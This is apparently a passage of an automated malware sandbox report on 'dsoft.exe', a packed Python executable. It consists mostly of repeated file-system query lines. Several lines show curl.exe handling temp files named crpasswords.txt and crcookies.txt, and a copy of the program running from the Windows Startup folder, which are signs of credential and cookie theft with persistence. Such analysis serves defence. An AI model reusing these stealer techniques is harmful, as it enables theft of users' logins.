Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32\pythoncom310.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32\win32api.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32com VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32com VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32com VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\curl.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\crpasswords.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Util VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\win32 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\curl.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\crcookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22482\base_library.zip VolumeInformation	Jump to behavior
